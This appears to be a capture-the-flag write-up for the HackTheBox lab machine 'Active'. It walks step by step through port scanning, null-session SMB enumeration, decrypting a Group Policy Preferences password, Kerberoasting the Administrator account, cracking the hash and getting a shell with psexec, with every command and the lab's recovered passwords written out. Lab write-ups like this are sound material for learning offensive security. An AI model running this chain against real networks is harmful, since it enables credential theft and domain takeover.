Active

Published: Feb 25, 2025

Enumeration

Scan

The following is a one-liner I came up with to scan HTB machines, which uses rustscan to quickly identify all open TCP ports and then does a detailed scan using nmap 

TARGET=10.10.10.100; rustscan -r 1-65535 --scripts none -a $TARGET | tee scans/fast.rustscan | grep '\->' | awk -F'[' '{print $2}' | sed 's/]//' | read PORTS; nmap -sC -sV -oN scans/detailed.nmap -p $PORTS $TARGET

SMB

Let’s see if we can enumerate SMB without any valid credentials (null authentication) 

nxc smb 10.10.10.100 -u '' -p '' --shares

We can read a share called “Replication”. Let’s use the spider_plus module to look for potentially interesting files 

nxc smb 10.10.10.100 -u '' -p '' -m spider_plus

The output is in json format and is saved in /tmp/nxc_hosted/nxc_spider_plus as 10.10.10.100.json

Let’s use jq for some nice output 

cat /tmp/nxc_hosted/nxc_spider_plus/10.10.10.100.json | jq .

One file that stands out to me is the Groups.xml file

Let’s download it to our local machine using smbclient while specifying null credentials 

smbclient -U '%' //10.10.10.100/Replication

Foothold

Group Policy Preferences (GPP)

Taking a look at the file we downloaded:
This is a file related to Group Policy Preferences (GPP), which, according to the MSDN, is "a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems." The XML config file contains a password encrypted with a key that has been published by Microsoft.

The cpassword can be decrypted using a tool called gpp-decrypt 

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

The password for the svc_tgs account is GPPStillStandingStrong2k18

SMB (Again)

Now that we have new credentials, let's enumerate SMB again 

nxc smb 10.10.10.100 -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --shares

We can now read a lot more shares, which includes the "Users" share
You can do some looking around, but there isn’t much other than the user.txt flag

Privilege Escalation

Bloodhound

From our enumeration, we know that we are attacking the Domain Controller for the domain active.htb
One tool I always run in Active Directory environments is Bloodhound, because it allows you to visualize the attack surface. The tool is not required to solve this machine, but it is what I used to find the next step. To set up Bloodhound on kali, reference this documentation.

I will use bloodhound.py as my ingestor (Github) 

python3 bloodhound.py -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -d active.htb -ns 10.10.10.100 -c all

After loading the data into Bloodhound and going through some of the "Analysis" queries, I was able to spot something unusual: the Administrator account is Kerberoastable.

Kerberoast

A user object can contain a Service Principal Name (SPN) to act as a service account. When a user requests a Ticket Granting Service (TGS) ticket from an SPN, it is encrypted using a hash derived from the corresponding account's password. The Kerberoast attack involves requesting the TGS and cracking the password offline.

To get a crackable hash, use GetUserSPNs from impacket 

impacket-GetUserSPNs active.htb/svc_tgs:'GPPStillStandingStrong2k18' -dc-ip 10.10.10.100 -request

Let's try cracking it with hashcat and the rockyou.txt wordlist 

hashcat -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt

We now have the Administrator's password: Ticketmaster1968

Shell Access

With these administrative credentials, there are a number of ways to get shell access on the box
I will use psexec from impacket and retrieve the root.txt flag from the Administrator's desktop 

impacket-psexec administrator:'Ticketmaster1968'@10.10.10.100